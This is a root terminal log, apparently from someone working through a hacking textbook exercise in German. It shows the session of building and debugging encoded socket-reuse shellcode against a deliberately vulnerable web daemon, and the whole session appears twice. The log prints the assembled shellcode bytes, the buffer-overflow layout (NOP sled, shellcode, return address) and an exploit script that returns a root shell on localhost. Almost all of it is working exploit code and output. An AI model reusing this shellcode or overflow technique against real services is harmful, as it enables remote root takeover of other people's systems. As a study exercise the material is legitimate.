root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# echo "/bin/sh" | hexdump -C
00000000 2f 62 69 6e 2f 73 68 0a |/bin/sh.|
00000008
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# gdb -q
(gdb) print /x 0x0068732f + 0x05050505
$1 = 0x56d7834
(gdb) print /x 0x6e69622f + 0x05050505
$2 = 0x736e6734
(gdb) quit
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# gdb -q ./tinywebd
Reading symbols from /home/tomovic/Dokumente/hack/tinywebd...done.
(gdb) set disassembly-flavor intel
(gdb) set follow-fork-mode child
(gdb) run
Starting program: /home/tomovic/Dokumente/hack/tinywebd
Starting tiny web daemon..
Das andere Terminal könnt ihr ja vom Buch übernehmen.
Program received signal SIGTRAP, Trace/breakpoint trap.
[Switching to process 2675]
0xbffff60b in ?? ()
(gdb) x/10i $eip
=> 0xbffff60b: push 0x8
0xbffff60d: pop edx
0xbffff60e: sub BYTE PTR [ebx+edx*1],0x5
0xbffff612: dec edx
0xbffff613: jns 0xbffff60e
0xbffff615: int3
0xbffff616: xor edx,edx
0xbffff618: push edx
0xbffff619: mov edx,esp
0xbffff61b: push ebx
(gdb) x/8c $ebx
0xbffff698: 52 '4' 103 'g' 110 'n' 115 's' 52 '4' 120 'x' 109 'm' 5 '\005'
(gdb) cont
Continuing.
[tcsetpgrp failed in terminal_inferior: Kein passender Prozess gefunden]
Program received signal SIGTRAP, Trace/breakpoint trap.
0xbffff616 in ?? ()
(gdb) x/8c $ebx
0xbffff698: 47 '/' 98 'b' 105 'i' 110 'n' 47 '/' 115 's' 104 'h' 0 '\000'
(gdb) x/s $ebx
0xbffff698: "/bin/sh"
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# sed -e 's/int3/;int3/g' encoded_sockreuserestore_dbg.s > encoded_sockreuserestore.s
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# diff encoded_sockreuserestore_dbg.s encoded_sockreuserestore.s 33c33
diff: extra Argument »33c33«.
diff: »diff --help« gibt Ihnen mehr Informationen.
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# diff encoded_sockreuserestore_dbg.s encoded_sockreuserestore.s
33c33
< int3 ; breakpoint before decoding (REMOVE WHEN NOT DEBUGGING)
---
> ;int3 ; breakpoint before decoding (REMOVE WHEN NOT DEBUGGING)
42c42
< int3 ; breakpoint after decoding (REMOVE WHEN NOT DEBUGGING)
---
> ;int3 ; breakpoint after decoding (REMOVE WHEN NOT DEBUGGING)
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# nasm encoded_sockreuserestore.s
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# hexdump -C encoded_sockreuserestore
00000000 6a 02 58 cd 80 85 c0 74 0a 8d 6c 24 68 68 b7 8f |j.X....t..l$hh..|
00000010 04 08 c3 8d 54 24 4c 8b 1a 6a 02 59 31 c0 b0 3f |....T$L..j.Y1..?|
00000020 cd 80 49 79 f9 b0 0b 68 34 78 6d 05 68 34 67 6e |..Iy...h4xm.h4gn|
00000030 73 89 e3 6a 08 5a 80 2c 13 05 4a 79 f9 31 d2 52 |s..j.Z.,..Jy.1.R|
00000040 89 e2 53 89 e1 cd 80 |..S....|
00000047
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./tinywebd
Starting tiny web daemon..
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./xt_reuse.sh encoded_sockreuserestore 127.0.0.1
target IP: 127.0.0.1
shellcode: encoded_sockreuserestore (71 bytes)
fake request: "GET / HTTP/1.1\x00" (15 bytes)
[Fake Request 15] [spoof IP 16] [NOP 298] [shellcode 71] [ret addr 128] [*fake_addr 8]
Connection to 127.0.0.1 80 port [tcp/http] succeeded!
whoami
root
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# echo "/bin/sh" | hexdump -C
00000000 2f 62 69 6e 2f 73 68 0a |/bin/sh.|
00000008
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# gdb -q
(gdb) print /x 0x0068732f + 0x05050505
$1 = 0x56d7834
(gdb) print /x 0x6e69622f + 0x05050505
$2 = 0x736e6734
(gdb) quit
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# gdb -q ./tinywebd
Reading symbols from /home/tomovic/Dokumente/hack/tinywebd...done.
(gdb) set disassembly-flavor intel
(gdb) set follow-fork-mode child
(gdb) run
Starting program: /home/tomovic/Dokumente/hack/tinywebd
Starting tiny web daemon..
Das andere Terminal könnt ihr ja vom Buch übernehmen.
Program received signal SIGTRAP, Trace/breakpoint trap.
[Switching to process 2675]
0xbffff60b in ?? ()
(gdb) x/10i $eip
=> 0xbffff60b: push 0x8
0xbffff60d: pop edx
0xbffff60e: sub BYTE PTR [ebx+edx*1],0x5
0xbffff612: dec edx
0xbffff613: jns 0xbffff60e
0xbffff615: int3
0xbffff616: xor edx,edx
0xbffff618: push edx
0xbffff619: mov edx,esp
0xbffff61b: push ebx
(gdb) x/8c $ebx
0xbffff698: 52 '4' 103 'g' 110 'n' 115 's' 52 '4' 120 'x' 109 'm' 5 '\005'
(gdb) cont
Continuing.
[tcsetpgrp failed in terminal_inferior: Kein passender Prozess gefunden]
Program received signal SIGTRAP, Trace/breakpoint trap.
0xbffff616 in ?? ()
(gdb) x/8c $ebx
0xbffff698: 47 '/' 98 'b' 105 'i' 110 'n' 47 '/' 115 's' 104 'h' 0 '\000'
(gdb) x/s $ebx
0xbffff698: "/bin/sh"
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# sed -e 's/int3/;int3/g' encoded_sockreuserestore_dbg.s > encoded_sockreuserestore.s
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# diff encoded_sockreuserestore_dbg.s encoded_sockreuserestore.s 33c33
diff: extra Argument »33c33«.
diff: »diff --help« gibt Ihnen mehr Informationen.
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# diff encoded_sockreuserestore_dbg.s encoded_sockreuserestore.s
33c33
< int3 ; breakpoint before decoding (REMOVE WHEN NOT DEBUGGING)
---
> ;int3 ; breakpoint before decoding (REMOVE WHEN NOT DEBUGGING)
42c42
< int3 ; breakpoint after decoding (REMOVE WHEN NOT DEBUGGING)
---
> ;int3 ; breakpoint after decoding (REMOVE WHEN NOT DEBUGGING)
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# nasm encoded_sockreuserestore.s
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# hexdump -C encoded_sockreuserestore
00000000 6a 02 58 cd 80 85 c0 74 0a 8d 6c 24 68 68 b7 8f |j.X....t..l$hh..|
00000010 04 08 c3 8d 54 24 4c 8b 1a 6a 02 59 31 c0 b0 3f |....T$L..j.Y1..?|
00000020 cd 80 49 79 f9 b0 0b 68 34 78 6d 05 68 34 67 6e |..Iy...h4xm.h4gn|
00000030 73 89 e3 6a 08 5a 80 2c 13 05 4a 79 f9 31 d2 52 |s..j.Z.,..Jy.1.R|
00000040 89 e2 53 89 e1 cd 80 |..S....|
00000047
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./tinywebd
Starting tiny web daemon..
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./xt_reuse.sh encoded_sockreuserestore 127.0.0.1
target IP: 127.0.0.1
shellcode: encoded_sockreuserestore (71 bytes)
fake request: "GET / HTTP/1.1\x00" (15 bytes)
[Fake Request 15] [spoof IP 16] [NOP 298] [shellcode 71] [ret addr 128] [*fake_addr 8]
Connection to 127.0.0.1 80 port [tcp/http] succeeded!
whoami
root